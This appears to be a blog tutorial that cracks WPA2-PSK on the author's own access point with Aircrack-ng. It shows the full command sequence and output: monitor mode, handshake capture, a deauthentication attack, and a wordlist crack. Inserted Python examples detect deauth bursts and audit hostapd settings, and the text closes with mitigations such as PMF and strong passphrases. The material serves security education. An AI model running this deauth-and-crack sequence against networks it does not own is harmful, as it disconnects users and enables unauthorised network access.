Hey there :) Well, time to have a little fun with WPA2-PSK cracking, using the Aircrack-ng suite of tools. Here I'm using a Kali host, but you can use anything you like. Well, not Windows, it's usually not good for anything cracking related :)
Okay, ready? So strap yourself in, and let's go joyriding in Wifi-Land.
You will need an Access Point set up for WPA2-PSK. Since most people have that (no WEP, right?!), that should be taken care of. If it's not, go consult your ISP docs, switch your AP to WPA2-PSK, and come back again :)
You will also need two machines, one attacker and one client. As I said, my attacker is a Kali host; my client is an ordinary tablet, it's not important. As long as it can send a request to join the network, it's good enough. On the attacker you also need a wifi card capable of injection / suitable for Aircrack-ng. It has to be able to run monitor mode, as we will need it to capture packets.
The first thing we need to do is see if we can find a network. Let's play around with airmon-ng for that. Since we don't know what AP / network we'll be targeting, let's have a look around. Start the wifi card in monitor mode with the command
airmon-ng start wlan0
Here wlan0 is my card, found by running a quick ifconfig command.
The output you'll see looks like this.
Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
 1232 avahi-daemon
 1239 avahi-daemon
 7001 wpa_supplicant
 8586 NetworkManager

PHY     Interface       Driver          Chipset
phy1    wlan0           rtl8192cu       Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter
                (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
                (mac80211 station mode vif disabled for [phy1]wlan0)
Note it says it found four processes that can cause trouble. We could kill them off, as the output suggests, with airmon-ng check kill (or pkill them by hand), but we'll let them run for now.
Also note that it made a new interface, namely wlan0mon. Let's see if that's true. Run ifconfig
wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 00-13-EF-F1-03-69-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 10510  bytes 2570977 (2.4 MiB)
        RX errors 0  dropped 10510  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
If it did, you should see something like this in your ifconfig output. If you have that, let's go ahead and see if we can find a wifi network.
For that we use airodump-ng, with the command
airodump-ng wlan0mon
That command will give you output that looks something like this. Please note, this is edited a bit :)
 CH  2 ][ Elapsed: 1 min ][ 2020-04-04 16:06 ][ WPA handshake: 30:91:8F:F8:41:9D

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 50:6A:03:DF:5C:EC   -1        0        0    0  13  -1                    <length: 0>
 00:23:69:2F:6B:F5  -56      254       76    0  11  54   WPA  CCMP   PSK  linksys

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 (not associated)   6C:88:14:AE:31:5C  -65    0 - 1      0       11         some_host
 (not associated)   DA:A1:19:68:CB:A2  -67    0 - 1      0        5
The important thing to notice is that the CH field will drift, because airodump-ng switches channels (it "hops") to get the widest coverage possible. For now that's okay, since we're just doing recon, not actively attacking.
The BSSID is the router's MAC. That will come into play a bit later, when we're fine-tuning for the attack. Note that under ESSID we have a hidden network, <length: 0>, and we have my target test network, linksys.
We also have the channel (CH), data count (#Data), encryption (ENC), cipher (CIPHER), and finally authentication (AUTH). The auth is important. It has to be PSK, since we're attacking a network running a pre-shared key. Most networks do. The other type is RADIUS (WPA-Enterprise); that's for another tutorial, let's keep it simple :)
So, now we have to fine-tune our network sniffer; let's see what the help has to say about what we can do. Remember we have to use a couple of parameters: BSSID, ESSID, and channel.
Consult the help for airodump-ng with
airodump-ng -H
It should tell you that we need a couple of switches. We can filter on BSSID (router MAC) or ESSID (network name). Mine's 00:23:69:2F:6B:F5 and "linksys".
To set the ESSID we need the --essid switch, and we need the channel set to 11 with the --channel switch. We also need to write a dump file, that's the --write switch, and last the interface name, which is wlan0mon for me.
The entire command would be something like this
airodump-ng --essid linksys --channel 11 --write linksysdump.pcap wlan0mon
After that, your output should be something like this
 CH 11 ][ Elapsed: 18 s ][ 2020-04-04 16:26

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:69:2F:6B:F5  -41  93      152        9    0  11  54   WPA  CCMP   PSK  linksys

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 (not associated)   44:91:60:4C:AC:CA  -77    0 - 1      0        1
The next thing we need to hunt for is connected clients. They should appear under BSSID and STATION. Here's my laptop
 CH 11 ][ Elapsed: 55 s ][ 2020-04-04 16:38

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:69:2F:6B:F5  -47 100      447       55    0  11  54   WPA  CCMP   PSK  linksys

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:23:69:2F:6B:F5  2C:FD:AB:E0:0D:AB  -27    1 - 6      0       38
 00:23:69:2F:6B:F5  7C:7A:91:E4:1F:F1  -29    1 - 2e     0       10
My laptop would be 7C:7A:91:E4:1F:F1. We need to remember that, since we'll use it in a minute. To get the key material, we need to kick it off the network, and we do that with aireplay-ng.
If we have a look at aireplay-ng using the -H switch, we get this :) Please note that the output is shortened for readability.
Aireplay-ng 1.6 - (C) 2006-2020 Thomas d'Otreppe
https://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
--deauth-rc rc : Deauthentication reason code [0-254] (Default: 7)
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
So, it seems if we run
aireplay-ng --deauth 5 -a 00:23:69:2F:6B:F5 -d 7C:7A:91:E4:1F:F1 wlan0mon
it should do the trick, knocking off my laptop, forcing it to reconnect and, in the process, send us a handshake :)
aireplay-ng --deauth 5 -a 00:23:69:2F:6B:F5 -d 7C:7A:91:E4:1F:F1 wlan0mon
16:52:35 Waiting for beacon frame (BSSID: 00:23:69:2F:6B:F5) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
16:52:36 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
16:52:36 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
16:52:37 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
16:52:37 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
16:52:37 Sending DeAuth (code 7) to broadcast -- BSSID: [00:23:69:2F:6B:F5]
And with that, the laptop disconnects and wants to authenticate again, retransmitting the handshake. Remember, the deauth has to be done from another terminal, so airodump-ng keeps running to capture the handshake :)
When it does, your airodump-ng window will show that it captured a handshake, like this
 CH 11 ][ Elapsed: 6 s ][ 2020-04-04 16:59 ][ WPA handshake: 00:23:69:2F:6B:F5

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:69:2F:6B:F5  -42 100       52       19    8  11  54   WPA  CCMP   PSK  linksys

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 (not associated)   34:E1:2D:81:A5:01  -59    0 - 1      6        3
 00:23:69:2F:6B:F5  7C:7A:91:E4:1F:F1  -33   54 - 1      3       21  PMKID  linksys
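The burst above (five deauth frames to broadcast inside about two seconds) is exactly the pattern a wireless IDS looks for. Here is the defender's side of that step, as an added example that is not code from the original post or from the Aircrack-ng project: a small check that groups deauth frames per BSSID and alerts when a burst reaches a threshold. The frame records are constructed to mirror the page's output, and the threshold and window values are assumptions for this example, not values from any tool.

```python
"""Deauthentication-burst detector over parsed 802.11 management frames.

Added example, not code from the original post or from the Aircrack-ng
project. It groups deauth frames per BSSID into bursts and alerts when a
burst reaches `threshold` frames. The frame records below are constructed
to mirror the burst on the page (five deauth frames, reason code 7, sent to
broadcast within ~2 seconds), plus normal traffic and one legitimate deauth
from another AP that must not alert.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    ts: float                      # capture timestamp in seconds
    subtype: str                   # "deauth", "beacon", "data", ...
    bssid: str                     # AP address the frame claims to come from
    dst: str                       # destination address
    reason: Optional[int] = None   # deauth reason code, if any


# Constructed sample capture (not real traffic).
SAMPLE_FRAMES = [
    Frame(0.00, "beacon", "00:23:69:2f:6b:f5", BROADCAST),
    Frame(0.10, "data",   "00:23:69:2f:6b:f5", "7c:7a:91:e4:1f:f1"),
    Frame(1.02, "deauth", "00:23:69:2f:6b:f5", BROADCAST, 7),
    Frame(1.31, "deauth", "00:23:69:2f:6b:f5", BROADCAST, 7),
    Frame(1.80, "deauth", "00:23:69:2f:6b:f5", BROADCAST, 7),
    Frame(2.05, "deauth", "00:23:69:2f:6b:f5", BROADCAST, 7),
    Frame(2.40, "deauth", "00:23:69:2f:6b:f5", BROADCAST, 7),
    Frame(2.50, "beacon", "00:23:69:2f:6b:f5", BROADCAST),
    # A single deauth from another AP to one client (station leaving) is normal.
    Frame(3.00, "deauth", "aa:bb:cc:00:00:01", "de:ad:be:ef:00:01", 3),
]


def deauth_bursts(frames: List[Frame], threshold: int = 4, window: float = 2.0) -> List[Dict]:
    """Group deauth frames per BSSID into bursts (consecutive frames no more
    than `window` seconds apart) and return one alert per burst that reaches
    `threshold` frames. Broadcast deauths are flagged separately because a
    real AP rarely needs to disconnect every client at once."""
    per_bssid: Dict[str, List[Frame]] = defaultdict(list)
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype == "deauth":
            per_bssid[f.bssid].append(f)

    alerts: List[Dict] = []
    for bssid, deauths in per_bssid.items():
        bursts: List[List[Frame]] = [[deauths[0]]]
        for f in deauths[1:]:
            if f.ts - bursts[-1][-1].ts <= window:
                bursts[-1].append(f)
            else:
                bursts.append([f])
        for burst in bursts:
            if len(burst) >= threshold:
                alerts.append({
                    "bssid": bssid,
                    "count": len(burst),
                    "first_ts": burst[0].ts,
                    "last_ts": burst[-1].ts,
                    "broadcast": all(f.dst == BROADCAST for f in burst),
                    "reasons": sorted({f.reason for f in burst if f.reason is not None}),
                })
    return alerts


def format_alert(alert: Dict) -> str:
    """Render an alert as one log line."""
    target = "broadcast" if alert["broadcast"] else "targeted"
    return (f"DEAUTH BURST bssid={alert['bssid']} count={alert['count']} "
            f"span={alert['last_ts'] - alert['first_ts']:.2f}s {target} "
            f"reasons={alert['reasons']}")


if __name__ == "__main__":
    for a in deauth_bursts(SAMPLE_FRAMES):
        print(format_alert(a))
```

On the constructed sample this raises one alert, for the AP's BSSID, counting all five frames; the lone deauth from the other AP falls below the threshold and stays quiet. The grouping is by gap between consecutive frames rather than a fixed window, so a long burst is reported once rather than once per window.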
Now, for the final part, let's get cracking on that handshake file. A note here: we can't crack the handshake with a dictionary attack if the password's NOT in the dictionary. It has to be.
We could do a brute-force attack if we had enough computing power, but since that's not really an option, due to the cost of building a WPA cracking cluster, let's forget that option.
For a simple test, I made a password file with the right password as one of the entries, just to demonstrate the concept.
A capture file would be named something like somefilename.cap. Let's feed it to aircrack-ng and see if we can crack this thing :)
For that we need the -e switch set to the network name, the dictionary file set with the -w option, and the cap file. So let's try this. My command is this, yours will be a bit different.
aircrack-ng -e linksys -w passwd.lst linksysdump.pcap-02.cap
Sometimes it will throw a "Key not found" error because the handshake / capture file is not clean, so run it through wpaclean first to be sure.
wpaclean essid_clean.cap unclean_dump_file.cap
After cleaning, run the cracker. Mine runs in a couple of seconds, because there's only the right password in the file for the cracker to try. Here's the output
                               Aircrack-ng 1.6

      [00:00:00] 1/1 keys tested (30.05 k/s)

      Time left: --

                       KEY FOUND! [ cznyqXXXXX ]

      Master Key     : CE CA 1D 67 86 23 66 C4 FB 2B A2 2C E1 11 CF 90
                       F7 D6 06 07 45 51 F6 35 F3 BC 5C F5 6B 69 E9 31

      Transient Key  : 80 69 13 B1 BE DB 0B 44 19 9C 5D 02 3F 89 F4 EC
                       85 B3 5B C1 A0 53 40 3C 74 F4 CB 53 E4 F8 8F 54
                       41 73 FE CD E2 E5 BF A4 DA 60 23 A2 FC B9 A8 65
                       95 79 51 3A 33 42 DE E8 89 EB 88 1F 31 E8 6E 24

      EAPOL HMAC     : A2 CE 8E 57 41 03 3A 2A 54 DA 7A E5 F7 2A F2 34
Basically, that's all there is to it. It's pretty straightforward to do. But can we stop this from happening?
Yes, by using a good password that's not so easy to guess. For that, go read my thoughts on the subject in Wifi security.
We could also enable Protected Management Frames (PMF) on our Access Point. That would stop an attacker from kicking us off the network to get a handshake.
There are other strategies for that, namely the "False Access Point" attack, where an attacker forces a client to connect to a duplicate access point, using raw transmit power to override the real AP.
This was just a very basic intro to Wifi cracking, WPA style. There are other tools and techniques out there for the lazy ones, and I'll try to cover those in another article.
But for now, hit the books, hit Google and get smarter on Wifi cracking; there's so much more to be learned, and the journey's just beginning.
Have fun, and pleeease, stay off your neighbours' Wifi :)
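The two mitigations above (a passphrase that is not in any dictionary, and PMF so that forged deauth frames are ignored) map to a handful of hostapd.conf keys. As an added example that is not code from the original post or from the hostapd project, here is a small audit that parses a hostapd configuration and reports the weak settings, with a constructed "before" config beside a constructed "after" config. The keys checked (wpa, wpa_key_mgmt, wpa_passphrase, rsn_pairwise, ieee80211w) are real hostapd keys; the 20-character minimum and the tiny wordlist are policy choices assumed for this example.

```python
"""Audit a hostapd configuration for a strong pre-shared key and PMF.

Added example, not code from the original post or from the hostapd project.
The configuration keys (wpa, wpa_key_mgmt, wpa_passphrase, rsn_pairwise,
ieee80211w) are real hostapd.conf keys; the two configs below are
constructed samples, and the 20-character minimum passphrase length and
the tiny wordlist are policy choices of this example, not hostapd rules.
"""
from typing import Dict, List, Tuple

# Constructed "before": WPA2-PSK with PMF disabled and a dictionary word as PSK.
WEAK_CONF = """
interface=wlan0
ssid=linksys
hw_mode=g
channel=11
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=password
rsn_pairwise=CCMP TKIP
ieee80211w=0
"""

# Constructed "after": PMF required, CCMP only, long placeholder passphrase.
HARDENED_CONF = """
interface=wlan0
ssid=linksys
hw_mode=g
channel=11
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=replace-me-with-a-long-random-passphrase
rsn_pairwise=CCMP
ieee80211w=2
"""

# Constructed stand-in for the kind of list aircrack-ng is fed with -w.
COMMON_PASSPHRASES = {"password", "12345678", "linksys", "admin123"}


def parse_hostapd(text: str) -> Dict[str, str]:
    """Parse key=value lines; blank lines and # comments are ignored."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip()] = value.strip()
    return conf


def audit_hostapd(conf: Dict[str, str], min_passphrase_len: int = 20) -> List[Tuple[str, str]]:
    """Return (key, finding) pairs; an empty list means every check passed."""
    findings: List[Tuple[str, str]] = []

    # wpa=1 is WPA only, wpa=3 offers WPA and WPA2; only wpa=2 is RSN-only.
    if conf.get("wpa") != "2":
        findings.append(("wpa", "set wpa=2 so only WPA2 (RSN) is offered"))

    if "TKIP" in conf.get("rsn_pairwise", "").split():
        findings.append(("rsn_pairwise", "drop TKIP and keep rsn_pairwise=CCMP"))

    # ieee80211w: 0 = disabled, 1 = optional, 2 = required (PMF).
    if conf.get("ieee80211w", "0") != "2":
        findings.append(("ieee80211w",
                         "set ieee80211w=2 so clients reject unprotected deauth frames"))

    pw = conf.get("wpa_passphrase", "")
    if not 8 <= len(pw) <= 63:
        findings.append(("wpa_passphrase", "WPA2-PSK passphrases must be 8 to 63 characters"))
    elif len(pw) < min_passphrase_len:
        findings.append(("wpa_passphrase",
                         f"passphrase is {len(pw)} characters; use at least {min_passphrase_len}"))
    if pw.lower() in COMMON_PASSPHRASES:
        findings.append(("wpa_passphrase",
                         "passphrase is in a common wordlist; a captured handshake would be cracked"))

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}:")
        for key, msg in audit_hostapd(parse_hostapd(text)) or [("-", "no findings")]:
            print(f"  {key}: {msg}")
```

Run against the weak config this reports the TKIP cipher, the disabled PMF, and two passphrase findings (too short for the policy, and present in the wordlist); the hardened config comes back clean. Note that PMF only helps if the clients support it too, which is why ieee80211w=1 (optional) exists as a transition setting; the audit deliberately treats anything but 2 as a finding.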